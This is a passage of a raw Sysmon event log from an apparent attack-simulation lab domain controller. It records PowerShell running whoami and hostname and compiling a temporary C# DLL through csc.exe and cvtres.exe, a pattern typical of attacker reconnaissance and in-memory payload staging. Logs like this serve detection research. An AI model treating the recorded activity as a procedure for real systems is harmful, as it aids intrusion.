15:16:35.642{732C744F-17DF-600B-9401-00000000A301}50844708C:\Windows\system32\csrss.exe{732C744F-3253-6010-CEA2-00000000A301}7736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000789521Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.626{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789520Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.626{732C744F-3253-6010-CDA2-00000000A301}65567252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{732C744F-3253-6010-CEA2-00000000A301}7736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000789519Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.641{732C744F-3253-6010-CEA2-00000000A301}7736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\2\RES4C7F.tmp" "c:\Users\Administrator\AppData\Local\Temp\2\pksi3saf\CSC6C4BD1F319E2433F8F971F2C1884CED.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{732C744F-3253-6010-CDA2-00000000A301}6556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\pksi3saf\pksi3saf.cmdline" 10341000x8000000000000000789518Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.548{732C744F-31A3-6010-A3A2-00000000A301}64165800C:\Windows\system32\conhost.exe{732C744F-3253-6010-CDA2-00000000A301}6556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789517Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.548{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789516Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.548{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789515Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.548{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789514Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.548{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789513Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.548{732C744F-17DF-600B-9401-00000000A301}50844476C:\Windows\system32\csrss.exe{732C744F-3253-6010-CDA2-00000000A301}6556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000789512Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.548{732C744F-31A3-6010-A2A2-00000000A301}7260604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{732C744F-3253-6010-CDA2-00000000A301}6556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22095acc|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220718a5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071576|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22b22bdb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+2203210c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220905db|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073ad1 154100x8000000000000000789511Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.559{732C744F-3253-6010-CDA2-00000000A301}6556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\pksi3saf\pksi3saf.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x8000000000000000789510Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.548{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\pksi3saf\pksi3saf.cmdline2021-01-26 15:16:35.548 11241100x8000000000000000789509Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.localDLL2021-01-26 15:16:35.548{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\pksi3saf\pksi3saf.dll2021-01-26 15:16:35.548 10341000x8000000000000000789508Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.376{732C744F-31A3-6010-A3A2-00000000A301}64165800C:\Windows\system32\conhost.exe{732C744F-3253-6010-CCA2-00000000A301}2812C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789507Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.376{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789506Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.376{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789505Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.376{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789504Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.376{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789503Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.376{732C744F-17DF-600B-9401-00000000A301}50844476C:\Windows\system32\csrss.exe{732C744F-3253-6010-CCA2-00000000A301}2812C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000789502Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.376{732C744F-31A3-6010-A2A2-00000000A301}7260604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{732C744F-3253-6010-CCA2-00000000A301}2812C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22bd0a1b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220718a5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071576|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22b22bdb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+2203210c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220905db|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073ad1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22065a56|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071f89|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071b25|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220718a5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071576|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22b22bdb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+2203210c 154100x8000000000000000789501Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.385{732C744F-3253-6010-CCA2-00000000A301}2812C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000789500Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.361{732C744F-31A3-6010-A3A2-00000000A301}64165800C:\Windows\system32\conhost.exe{732C744F-3253-6010-CBA2-00000000A301}5596C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789499Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.361{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789498Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.361{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL